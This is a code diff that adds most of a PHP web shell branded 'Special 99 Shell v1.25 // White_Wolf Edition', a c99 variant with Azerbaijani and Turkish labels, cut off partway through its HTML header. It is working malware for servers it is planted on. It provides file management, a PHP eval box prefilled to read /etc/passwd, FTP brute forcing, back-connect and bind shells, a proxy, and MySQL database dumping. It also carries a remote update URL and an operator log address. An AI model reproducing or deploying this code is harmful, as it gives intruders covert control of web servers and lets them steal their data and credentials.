+$log_email = "msn@g3n3t1x.org";
+$dsunucu = "http://q.qenetix.by.ru/3.txt";
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), 
+  array("config.php",1) 
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 100;
+
+
+$sess_cookie = "c99shvars"; 
+
+
+$quicklaunch = array(
+ array("<hr><center><font face='tahoma' size='1'><b>[AnaS&#601;hif&#601;]</b>",$surl),
+ array("<b><font face='tahoma' size='1'>[Axtar&#305;&#351;]</b>",$surl."act=search&d=%d"),
+
+ array("<b><font face='tahoma' size='1'>[Encode]</b>",$surl."act=encoder&d=%d"),
+ array("<b><font face='tahoma' size='1'>[&#304;&#351;l&#601;m&ccedil;i]</b>",$surl."act=processes&d=%d"),
+ array("<b><font face='tahoma' size='1'>[FTP Qirici]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b><font face='tahoma' size='1'>[Sistem M&#601;lumatlar&#305;]</b>",$surl."act=security&d=%d"),
+ array("<b><font face='tahoma' size='1'>[SQL Baglantisi]</b>",$surl."act=sql&d=%d"),
+ array("<b><font face='tahoma' size='1'>[php Kod i&#351;l&#601;t]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b><font face='tahoma' size='1'>[Arxa Qap&#305;]</b>",$surl."act=backc"),
+ array("<b><font face='tahoma' size='1'>[Shell'i Sil]</b>",$surl."act=selfremove"),
+
+ array("<b><font face='tahoma' size='1'>[ProxyQur]</b>",$surl."act=proxy"),
+ array("<b><font face='tahoma' size='1'>[Qapi Yarat]</b>",$surl."act=shbd"),
+);
+
+
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+
+
+
+// \/Burdan sonras&#1101;n&#1101; editlemeyiniz!\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Giris Yapilamiy0r!");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($g3n_onaysiz_giris);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://www.g3n3t1x.org
+#
+# Host Ayarlari:
+# MySQL Versiyon: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Tarih: ".date("d.m.Y H:i:s")."
+# Veritabani: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=green>&#304;&#351;l&#601;yir</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=red>&#304;&#351;l&#601;mir</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=red>&#304;&#351;l&#601;mir</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment); 
+@ini_set("highlight.default",$highlight_default); 
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string",$highlight_string); 
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>
+Special 99 Shell v1.25 // White_Wolf Edition</title><STYLE>
+TD { FONT-SIZE: 16pt; COLOR: #ebebeb; FONT-FAMILY: tahoma;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: tahoma;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: tahoma;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: tahoma; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: tahoma; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:tahoma; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: tahoma,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: tahoma; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style>
+</head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<div align="right"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2">
+	<p><font face="Tahoma"> <img src=http://caspian-pirates.org/once-vatan/logo.png></font></p>
+	<p><font face="Tahoma" size="3">&nbsp;&nbsp;&nbsp;Developing by &#3628;&#1106;&#3648;t&#1108;_&#3628;&#3663;l&#358;</font></p>
+			</p></th></tr><tr><td><p align="left"><b>
+		<font face="Tahoma" size="1">Sistem</font></b><font face='Tahoma' size='1'><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>
+			Sistem Melumatlari&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>B.Fonksiy0nlar&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:</b><b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=red> yox</font></b>";}else{echo "<font color=green>$df</font></b>";} ?><p align="left">
+		<b>Grup&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
